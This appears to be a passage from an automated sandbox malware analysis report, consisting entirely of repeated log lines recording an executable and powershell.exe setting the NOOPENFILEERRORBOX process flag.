                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\oS6KsQIqJxe038Y.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
